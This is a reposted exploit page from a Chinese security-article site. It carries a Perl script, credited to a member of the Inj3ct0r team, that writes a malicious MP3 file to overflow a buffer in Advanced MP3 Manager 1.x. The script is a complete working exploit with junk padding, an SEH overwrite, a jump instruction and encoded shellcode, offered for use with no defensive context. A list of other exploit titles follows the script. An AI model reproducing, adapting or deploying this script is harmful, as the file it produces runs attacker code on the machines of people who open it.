Advanced MP3 Manager 1.x Local Buffer Overflow

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Advanced MP3 Manager 1.x Local Buffer Overflow

来源：Angel-Injection@hotmail.com 作者：Angel 发布时间：2011-10-25

#!/usr/bin/perl

                          ||          ||   | ||      
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .

# Title: Advanced MP3 Manager 1.x Local Buffer Overflow #
# Date: 24/10/2011 #
# submited In http://1337day.com #

##########################################################################
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0#
#0     _                   __           __       __                     1#
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0#
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1#
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0#
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1#
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0#
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1#
#1                  \ \____/ >> Exploit database separated by exploit   0#
#0                   \/___/          type (local, remote, DoS, etc.)    1#
#1                                                                      1#
#0  [+] Site            : 1337day.com                                   0#
#1  [+] Support e-mail  : submit[at]1337day.com                         1#
#0                                                                      0#
#1               #########################################              1#
#0               I'm Angel Injection member from Inj3ct0r Team          1#
#1               #########################################              0#
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1#
##########################################################################
my $file= "exploit.mp3";
my $junk= "\x41" x  640;
my $junk1= "\x42" x 100000;
 
my $nsh="\xEB\x05\x90\x90";
my $eip1 = pack('V', 0x21003762);
 
my $shell =
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
 
open($FILE, ">$file");
print($FILE $junk.$nsh.$eip1.$shell.$junk1);
close($FILE);
print("exploit created successfully");

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告